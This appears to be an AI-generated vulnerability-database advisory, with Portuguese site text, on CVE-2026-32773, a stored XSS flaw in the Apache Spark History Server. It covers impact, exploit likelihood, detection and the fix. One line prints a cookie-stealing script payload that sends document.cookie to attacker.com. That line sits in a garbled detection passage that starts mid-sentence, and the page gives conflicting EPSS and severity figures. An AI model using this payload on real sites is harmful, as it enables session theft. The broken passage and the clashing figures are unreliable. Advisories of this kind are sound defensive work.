
PEACH
Uma estrutura de isolamento de inquilino
CVE-2026-32773 is a stored Cross-Site Scripting (XSS) vulnerability in the Apache Spark History Server that allows a malicious Spark job to inject arbitrary unescaped frontend code into the web interface. It affects Apache Spark versions 3.0.0 through 3.5.7 (prior to 3.5.8) and was disclosed on September 1, 2026 by Holden Karau via the oss-security mailing list, with credit to finder Yann Gourio. The vulnerability is tracked internally as SPARK-53747. It carries a CVSS v3.1 base score of 6.1 (Medium) (GitHub Advisory, oss-security).
The root cause is improper neutralization of script-related HTML tags in the Spark History Server web interface (CWE-80), where user-controlled data from Spark job metadata is rendered without proper HTML/JavaScript escaping. An attacker with permissions to submit a Spark job can embed malicious script payloads within job-related fields that are subsequently stored and rendered unescaped in the History Server UI. Exploitation requires a two-step social engineering component: the attacker submits a crafted job, then must trick a higher-privileged user into visiting the Spark History Server web page where the job history is displayed, triggering the injected script in the victim's browser (oss-security, GitHub Advisory).
Successful exploitation results in arbitrary JavaScript execution within the browser session of the targeted higher-privileged user, enabling minimal privilege escalation. The confidentiality and integrity impacts are both rated Low — an attacker could potentially steal session tokens, perform actions on behalf of the victim within the Spark History Server, or access information visible to the higher-privileged user. Availability is not impacted, and the scope is changed (affecting the victim's browser context rather than the server itself) (GitHub Advisory, oss-security).
There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation as of the disclosure date (GitHub Advisory). The EPSS score is approximately 0.258% (0.563% per GitHub Advisory), placing it in the lower percentiles for near-term exploitation likelihood. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is further constrained by the requirement that the attacker already possess permissions to launch Spark jobs and must successfully social-engineer a higher-privileged user to visit the History Server page (oss-security).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.<, >, script, javascript:) in job identifiers or application names; web server logs with encoded XSS strings in URL parameters or referrer fields.The primary remediation is to upgrade Apache Spark to version 3.5.8 or later, which includes proper XSS escaping in the History Server web interface (oss-security, GitHub Advisory). As interim mitigations, administrators should restrict network access to the Spark History Server web interface to trusted users only, and limit who has permissions to submit Spark jobs in the environment. Monitoring for suspicious job submissions containing HTML/script tags in metadata fields can also help detect exploitation attempts.
The vulnerability was disclosed via the Apache oss-security mailing list and the Apache announce list with low severity classification, reflecting the constrained exploitation path. No significant broader media coverage or notable researcher commentary beyond the initial disclosure has been identified. The Apache project itself characterized the risk as minimal given the prerequisite permissions required (oss-security).
Origem: Este relatório foi gerado usando IA
Avaliação de vulnerabilidade gratuita
Avalie suas práticas de segurança na nuvem em 9 domínios de segurança para comparar seu nível de risco e identificar lacunas em suas defesas.
Marque uma demonstração personalizada
"A melhor experiência do usuário que eu já vi, fornece visibilidade total para cargas de trabalho na nuvem."
"A Wiz fornece um único painel de vidro para ver o que está acontecendo em nossos ambientes de nuvem."
"Sabemos que se a Wiz identifica algo como crítico, na verdade é."